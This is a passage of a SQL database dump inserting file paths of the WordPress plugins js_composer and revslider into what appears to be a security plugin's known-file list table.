(1429, 'wp-content/plugins/js_composer/include/templates/shortcodes/rev_slider_vc.php'),
(1430, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion.php'),
(1431, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_accordion_tab.php'),
(1432, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid.php'),
(1433, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid_filter.php'),
(1434, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_btn.php'),
(1435, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_button.php'),
(1436, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_button2.php'),
(1437, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_column.php'),
(1438, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_column_inner.php'),
(1439, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_column_text.php'),
(1440, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta.php'),
(1441, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button.php'),
(1442, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_cta_button2.php'),
(1443, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_field.php'),
(1444, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_custom_heading.php'),
(1445, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_empty_space.php'),
(1446, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_facebook.php'),
(1447, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_flickr.php'),
(1448, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gallery.php'),
(1449, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem.php'),
(1450, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_animated_block.php'),
(1451, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_block.php'),
(1452, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_col.php'),
(1453, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_image.php'),
(1454, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_author.php'),
(1455, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_categories.php'),
(1456, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_data.php'),
(1457, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_meta.php'),
(1458, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_row.php'),
(1459, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone.php'),
(1460, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_zone_c.php'),
(1461, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gmaps.php'),
(1462, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_googleplus.php'),
(1463, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gutenberg.php'),
(1464, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_hoverbox.php'),
(1465, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_icon.php');
INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(1466, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_images_carousel.php'),
(1467, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_item.php'),
(1468, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_items.php'),
(1469, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_line_chart.php'),
(1470, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_message.php'),
(1471, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_pie.php'),
(1472, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_pinterest.php'),
(1473, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_posts_slider.php'),
(1474, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_progress_bar.php'),
(1475, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_raw_html.php'),
(1476, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_round_chart.php'),
(1477, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_row.php'),
(1478, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_row_inner.php'),
(1479, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_section.php'),
(1480, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_separator.php'),
(1481, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_single_image.php'),
(1482, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tab.php'),
(1483, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tabs.php'),
(1484, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_text_separator.php'),
(1485, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_toggle.php'),
(1486, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_global.php'),
(1487, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_pageable_section.php'),
(1488, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_section.php'),
(1489, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tweetmeme.php'),
(1490, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_video.php'),
(1491, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_widget_sidebar.php'),
(1492, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_archives.php'),
(1493, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_calendar.php'),
(1494, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_categories.php'),
(1495, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_custommenu.php'),
(1496, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_links.php'),
(1497, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_meta.php'),
(1498, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_pages.php'),
(1499, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_posts.php'),
(1500, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_recentcomments.php'),
(1501, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_rss.php'),
(1502, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_search.php'),
(1503, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_tagcloud.php'),
(1504, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_text.php'),
(1505, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_zigzag.php'),
(1506, 'wp-content/plugins/js_composer/index.php'),
(1507, 'wp-content/plugins/js_composer/js_composer.php'),
(1508, 'wp-content/plugins/js_composer/vc_classmap.json.php'),
(1509, 'wp-content/plugins/revslider/admin/assets/css/font/egfont.svg'),
(1510, 'wp-content/plugins/revslider/admin/assets/css/font/index.php'),
(1511, 'wp-content/plugins/revslider/admin/assets/css/index.php'),
(1512, 'wp-content/plugins/revslider/admin/assets/images/index.php'),
(1513, 'wp-content/plugins/revslider/admin/assets/images/mainoptions/index.php'),
(1514, 'wp-content/plugins/revslider/admin/assets/images/navigationeditor/index.php'),
(1515, 'wp-content/plugins/revslider/admin/assets/images/sliderpresets/index.php'),
(1516, 'wp-content/plugins/revslider/admin/assets/images/sliderselector/index.php'),
(1517, 'wp-content/plugins/revslider/admin/assets/images/slidersources/index.php'),
(1518, 'wp-content/plugins/revslider/admin/assets/images/sources/index.php'),
(1519, 'wp-content/plugins/revslider/admin/assets/images/toolbar/index.php'),
(1520, 'wp-content/plugins/revslider/admin/assets/images/tooltips/index.php'),
(1521, 'wp-content/plugins/revslider/admin/assets/imports/agency-intro/index.php'),
(1522, 'wp-content/plugins/revslider/admin/assets/imports/classic-carousel/index.php'),
(1523, 'wp-content/plugins/revslider/admin/assets/imports/classicslider/index.php'),
(1524, 'wp-content/plugins/revslider/admin/assets/imports/concept/index.php'),
(1525, 'wp-content/plugins/revslider/admin/assets/imports/contenttabs/index.php'),
(1526, 'wp-content/plugins/revslider/admin/assets/imports/creativefreedom/index.php'),
(1527, 'wp-content/plugins/revslider/admin/assets/imports/facebook-feed/index.php'),
(1528, 'wp-content/plugins/revslider/admin/assets/imports/fashion/index.php'),
(1529, 'wp-content/plugins/revslider/admin/assets/imports/finedining/index.php'),
(1530, 'wp-content/plugins/revslider/admin/assets/imports/flickr-gallery/index.php'),
(1531, 'wp-content/plugins/revslider/admin/assets/imports/foodcarousel/index.php'),
(1532, 'wp-content/plugins/revslider/admin/assets/imports/fullscreen-button/index.php'),
(1533, 'wp-content/plugins/revslider/admin/assets/imports/gym/index.php'),
(1534, 'wp-content/plugins/revslider/admin/assets/imports/highlight-carousel/index.php'),
(1535, 'wp-content/plugins/revslider/admin/assets/imports/highlight-showcase/index.php'),
(1536, 'wp-content/plugins/revslider/admin/assets/imports/imagehero/index.php'),
(1537, 'wp-content/plugins/revslider/admin/assets/imports/index.php'),
(1538, 'wp-content/plugins/revslider/admin/assets/imports/insta-gallery/index.php'),
(1539, 'wp-content/plugins/revslider/admin/assets/imports/levanorestaurantbar/index.php'),
(1540, 'wp-content/plugins/revslider/admin/assets/imports/mainfeature/index.php'),
(1541, 'wp-content/plugins/revslider/admin/assets/imports/media-carousel-autoplay/index.php'),
(1542, 'wp-content/plugins/revslider/admin/assets/imports/media-gallery-two/index.php'),
(1543, 'wp-content/plugins/revslider/admin/assets/imports/news-bg-video/index.php'),
(1544, 'wp-content/plugins/revslider/admin/assets/imports/news-gallery/index.php'),
(1545, 'wp-content/plugins/revslider/admin/assets/imports/news-gallery-post-based/index.php'),
(1546, 'wp-content/plugins/revslider/admin/assets/imports/news-hero/index.php'),
(1547, 'wp-content/plugins/revslider/admin/assets/imports/news-video/index.php'),
(1548, 'wp-content/plugins/revslider/admin/assets/imports/newsletter-hero/index.php'),
(1549, 'wp-content/plugins/revslider/admin/assets/imports/notgeneric/index.php'),
(1550, 'wp-content/plugins/revslider/admin/assets/imports/parallaxscene/index.php'),
(1551, 'wp-content/plugins/revslider/admin/assets/imports/photography/index.php'),
(1552, 'wp-content/plugins/revslider/admin/assets/imports/photography-carousel/index.php'),
(1553, 'wp-content/plugins/revslider/admin/assets/imports/search-form-hero/index.php'),
(1554, 'wp-content/plugins/revslider/admin/assets/imports/showcasecarousel/index.php'),
(1555, 'wp-content/plugins/revslider/admin/assets/imports/slidingoverlays/index.php'),
(1556, 'wp-content/plugins/revslider/admin/assets/imports/sportshero/index.php'),
(1557, 'wp-content/plugins/revslider/admin/assets/imports/travel-static-captions/index.php'),
(1558, 'wp-content/plugins/revslider/admin/assets/imports/twitter-feed/index.php'),
(1559, 'wp-content/plugins/revslider/admin/assets/imports/vimeo-gallery/index.php'),
(1560, 'wp-content/plugins/revslider/admin/assets/imports/vimeohero/index.php'),
(1561, 'wp-content/plugins/revslider/admin/assets/imports/web-product-dark/index.php'),
(1562, 'wp-content/plugins/revslider/admin/assets/imports/web-product-dark-hero/index.php'),
(1563, 'wp-content/plugins/revslider/admin/assets/imports/web-product-light-hero/index.php'),
(1564, 'wp-content/plugins/revslider/admin/assets/imports/web-product-light-hero-3d/index.php'),
(1565, 'wp-content/plugins/revslider/admin/assets/imports/webproductlight/index.php'),
(1566, 'wp-content/plugins/revslider/admin/assets/imports/woobig/index.php'),
(1567, 'wp-content/plugins/revslider/admin/assets/imports/woocommercesmall/index.php'),
(1568, 'wp-content/plugins/revslider/admin/assets/imports/youtube-gallery/index.php'),
(1569, 'wp-content/plugins/revslider/admin/assets/imports/youtubehero/index.php'),
(1570, 'wp-content/plugins/revslider/admin/assets/index.php'),
(1571, 'wp-content/plugins/revslider/admin/assets/js/admin.js'),
(1572, 'wp-content/plugins/revslider/admin/assets/js/codemirror/codemirror.js'),
(1573, 'wp-content/plugins/revslider/admin/assets/js/codemirror/css.js'),
(1574, 'wp-content/plugins/revslider/admin/assets/js/codemirror/index.php'),
(1575, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/closetag.js'),
(1576, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/dialog.js'),
(1577, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/foldcode.js'),
(1578, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/formatting.js'),
(1579, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/index.php'),
(1580, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/javascript-hint.js'),
(1581, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/loadmode.js'),
(1582, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/match-highlighter.js'),
(1583, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/multiplex.js'),
(1584, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/overlay.js'),
(1585, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/pig-hint.js'),
(1586, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/runmode-standalone.js'),
(1587, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/runmode.js'),
(1588, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/search.js'),
(1589, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/searchcursor.js'),
(1590, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/simple-hint.js'),
(1591, 'wp-content/plugins/revslider/admin/assets/js/codemirror/util/xml-hint.js'),
(1592, 'wp-content/plugins/revslider/admin/assets/js/codemirror/xml.js'),
(1593, 'wp-content/plugins/revslider/admin/assets/js/context_menu.js'),
(1594, 'wp-content/plugins/revslider/admin/assets/js/css_editor.js'),
(1595, 'wp-content/plugins/revslider/admin/assets/js/edit_layers.js'),
(1596, 'wp-content/plugins/revslider/admin/assets/js/edit_layers_timeline.js'),
(1597, 'wp-content/plugins/revslider/admin/assets/js/index.php'),
(1598, 'wp-content/plugins/revslider/admin/assets/js/jquery.tipsy.js'),
(1599, 'wp-content/plugins/revslider/admin/assets/js/rev_addon-admin.js'),
(1600, 'wp-content/plugins/revslider/admin/assets/js/rev_admin.js'),
(1601, 'wp-content/plugins/revslider/admin/assets/js/settings.js'),
(1602, 'wp-content/plugins/revslider/admin/assets/js/tinymce-shortcode-script.js'),
(1603, 'wp-content/plugins/revslider/admin/assets/js/vc.js'),
(1604, 'wp-content/plugins/revslider/admin/index.php'),
(1605, 'wp-content/plugins/revslider/admin/revslider-admin.class.php'),
(1606, 'wp-content/plugins/revslider/admin/views/global-settings.php'),
(1607, 'wp-content/plugins/revslider/admin/views/index.php'),
(1608, 'wp-content/plugins/revslider/admin/views/master-view.php'),
(1609, 'wp-content/plugins/revslider/admin/views/navigation-editor.php'),
(1610, 'wp-content/plugins/revslider/admin/views/rev_addon-admin-display.php'),
(1611, 'wp-content/plugins/revslider/admin/views/slide-editor.php'),
(1612, 'wp-content/plugins/revslider/admin/views/slide-overview.php'),
(1613, 'wp-content/plugins/revslider/admin/views/slider-editor.php'),
(1614, 'wp-content/plugins/revslider/admin/views/slider-overview.php'),
(1615, 'wp-content/plugins/revslider/admin/views/system/dialog-copy-move.php'),
(1616, 'wp-content/plugins/revslider/admin/views/system/dialog-video.php'),
(1617, 'wp-content/plugins/revslider/admin/views/system/index.php'),
(1618, 'wp-content/plugins/revslider/admin/views/system/validation.php'),
(1619, 'wp-content/plugins/revslider/admin/views/templates/create-slider.php'),
(1620, 'wp-content/plugins/revslider/admin/views/templates/edit-slider.php'),
(1621, 'wp-content/plugins/revslider/admin/views/templates/index.php'),
(1622, 'wp-content/plugins/revslider/admin/views/templates/slide-general-settings.php'),
(1623, 'wp-content/plugins/revslider/admin/views/templates/slide-selector.php'),
(1624, 'wp-content/plugins/revslider/admin/views/templates/slide-stage.php'),
(1625, 'wp-content/plugins/revslider/admin/views/templates/slider-main-options.php'),
(1626, 'wp-content/plugins/revslider/admin/views/templates/sliders-list.php'),
(1627, 'wp-content/plugins/revslider/admin/views/templates/slides-list.php'),
(1628, 'wp-content/plugins/revslider/admin/views/templates/slides.php'),
(1629, 'wp-content/plugins/revslider/admin/views/templates/template-selector.php'),
(1630, 'wp-content/plugins/revslider/admin/views/templates/template-slider-selector.php'),
(1631, 'wp-content/plugins/revslider/admin/views/templates/wpml-selector.php'),
(1632, 'wp-content/plugins/revslider/backup/index.php'),
(1633, 'wp-content/plugins/revslider/includes/extension.class.php'),
(1634, 'wp-content/plugins/revslider/includes/external-sources.class.php'),
(1635, 'wp-content/plugins/revslider/includes/framework/addon-admin.class.php'),
(1636, 'wp-content/plugins/revslider/includes/framework/aq-resizer.class.php'),
(1637, 'wp-content/plugins/revslider/includes/framework/base-admin.class.php'),
(1638, 'wp-content/plugins/revslider/includes/framework/base-front.class.php'),
(1639, 'wp-content/plugins/revslider/includes/framework/base.class.php'),
(1640, 'wp-content/plugins/revslider/includes/framework/colorpicker.class.php'),
(1641, 'wp-content/plugins/revslider/includes/framework/cssparser.class.php'),
(1642, 'wp-content/plugins/revslider/includes/framework/db.class.php'),
(1643, 'wp-content/plugins/revslider/includes/framework/elements-base.class.php'),
(1644, 'wp-content/plugins/revslider/includes/framework/em-integration.class.php'),
(1645, 'wp-content/plugins/revslider/includes/framework/functions-wordpress.class.php'),
(1646, 'wp-content/plugins/revslider/includes/framework/functions.class.php'),
(1647, 'wp-content/plugins/revslider/includes/framework/include-framework.php'),
(1648, 'wp-content/plugins/revslider/includes/framework/index.php'),
(1649, 'wp-content/plugins/revslider/includes/framework/loadbalancer.class.php'),
(1650, 'wp-content/plugins/revslider/includes/framework/newsletter.class.php'),
(1651, 'wp-content/plugins/revslider/includes/framework/plugin-update.class.php'),
(1652, 'wp-content/plugins/revslider/includes/framework/update.class.php'),
(1653, 'wp-content/plugins/revslider/includes/framework/woocommerce.class.php'),
(1654, 'wp-content/plugins/revslider/includes/framework/wpml.class.php'),
(1655, 'wp-content/plugins/revslider/includes/globals.class.php'),
(1656, 'wp-content/plugins/revslider/includes/googlefonts.php'),
(1657, 'wp-content/plugins/revslider/includes/index.php'),
(1658, 'wp-content/plugins/revslider/includes/navigation.class.php'),
(1659, 'wp-content/plugins/revslider/includes/object-library.class.php'),
(1660, 'wp-content/plugins/revslider/includes/operations.class.php'),
(1661, 'wp-content/plugins/revslider/includes/output.class.php'),
(1662, 'wp-content/plugins/revslider/includes/page-template.class.php'),
(1663, 'wp-content/plugins/revslider/includes/slide.class.php'),
(1664, 'wp-content/plugins/revslider/includes/slider.class.php'),
(1665, 'wp-content/plugins/revslider/includes/template.class.php'),
(1666, 'wp-content/plugins/revslider/includes/tinybox.class.php'),
(1667, 'wp-content/plugins/revslider/includes/widget.class.php'),
(1668, 'wp-content/plugins/revslider/index.php'),
(1669, 'wp-content/plugins/revslider/languages/index.php'),
(1670, 'wp-content/plugins/revslider/public/assets/assets/index.php'),
(1671, 'wp-content/plugins/revslider/public/assets/assets/sources/index.php'),
(1672, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_3d_rotation_24px.svg'),
(1673, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_accessibility_24px.svg'),
(1674, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_accessible_24px.svg'),
(1675, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_24px.svg'),
(1676, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_balance_wallet_24px.svg'),
(1677, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_box_24px.svg'),
(1678, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_account_circle_24px.svg'),
(1679, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_add_shopping_cart_24px.svg'),
(1680, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_24px.svg'),
(1681, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_add_24px.svg'),
(1682, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_off_24px.svg'),
(1683, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_alarm_on_24px.svg'),
(1684, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_all_out_24px.svg'),
(1685, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_android_24px.svg'),
(1686, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_announcement_24px.svg'),
(1687, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_aspect_ratio_24px.svg'),
(1688, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assessment_24px.svg'),
(1689, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_24px.svg'),
(1690, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_ind_24px.svg'),
(1691, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_late_24px.svg'),
(1692, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_return_24px.svg'),
(1693, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_returned_24px.svg'),
(1694, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_turned_in_24px.svg'),
(1695, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_autorenew_24px.svg'),
(1696, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_backup_24px.svg'),
(1697, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_book_24px.svg'),
(1698, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_24px.svg'),
(1699, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bookmark_border_24px.svg'),
(1700, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_bug_report_24px.svg'),
(1701, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_build_24px.svg'),
(1702, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_cached_24px.svg'),
(1703, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_camera_enhance_24px.svg'),
(1704, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_giftcard_24px.svg'),
(1705, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_membership_24px.svg'),
(1706, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_travel_24px.svg'),
(1707, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_change_history_24px.svg'),
(1708, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_check_circle_24px.svg'),
(1709, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_chrome_reader_mode_24px.svg'),
(1710, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_class_24px.svg'),
(1711, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_code_24px.svg'),
(1712, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_compare_arrows_24px.svg'),
(1713, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_copyright_24px.svg'),
(1714, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_credit_card_24px.svg'),
(1715, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dashboard_24px.svg'),
(1716, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_date_range_24px.svg'),
(1717, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_delete_24px.svg'),
(1718, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_description_24px.svg'),
(1719, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_dns_24px.svg'),
(1720, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_24px.svg'),
(1721, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_done_all_24px.svg'),
(1722, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_large_24px.svg'),
(1723, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_donut_small_24px.svg'),
(1724, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_eject_24px.svg'),
(1725, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_24px.svg'),
(1726, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_seat_24px.svg'),
(1727, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_exit_to_app_24px.svg'),
(1728, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_explore_24px.svg'),
(1729, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_extension_24px.svg'),
(1730, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_face_24px.svg'),
(1731, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_24px.svg'),
(1732, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_favorite_border_24px.svg'),
(1733, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_feedback_24px.svg'),
(1734, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_in_page_24px.svg'),
(1735, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_find_replace_24px.svg'),
(1736, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_fingerprint_24px.svg'),
(1737, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_land_24px.svg'),
(1738, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flight_takeoff_24px.svg'),
(1739, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_back_24px.svg'),
(1740, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_flip_to_front_24px.svg'),
(1741, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gavel_24px.svg'),
(1742, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_get_app_24px.svg'),
(1743, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gif_24px.svg'),
(1744, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_grade_24px.svg'),
(1745, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_group_work_24px.svg'),
(1746, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_24px.svg'),
(1747, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_outline_24px.svg'),
(1748, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_highlight_off_24px.svg'),
(1749, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_history_24px.svg'),
(1750, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_home_24px.svg'),
(1751, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_empty_24px.svg'),
(1752, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_full_24px.svg'),
(1753, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_http_24px.svg'),
(1754, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_https_24px.svg'),
(1755, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_important_devices_24px.svg'),
(1756, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_24px.svg'),
(1757, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_info_outline_24px.svg'),
(1758, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_input_24px.svg'),
(1759, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_invert_colors_24px.svg'),
(1760, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_24px.svg'),
(1761, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_label_outline_24px.svg'),
(1762, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_language_24px.svg'),
(1763, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_launch_24px.svg'),
(1764, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lightbulb_outline_24px.svg'),
(1765, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_style_24px.svg'),
(1766, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_line_weight_24px.svg'),
(1767, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_list_24px.svg'),
(1768, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_24px.svg'),
(1769, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_open_24px.svg'),
(1770, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_lock_outline_24px.svg'),
(1771, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_loyalty_24px.svg'),
(1772, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_markunread_mailbox_24px.svg'),
(1773, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_motorcycle_24px.svg'),
(1774, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_note_add_24px.svg'),
(1775, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_offline_pin_24px.svg'),
(1776, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_opacity_24px.svg'),
(1777, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_in_browser_24px.svg'),
(1778, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_in_new_24px.svg'),
(1779, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_open_with_24px.svg'),
(1780, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pageview_24px.svg'),
(1781, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pan_tool_24px.svg'),
(1782, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_payment_24px.svg'),
(1783, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_camera_mic_24px.svg'),
(1784, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_contact_calendar_24px.svg'),
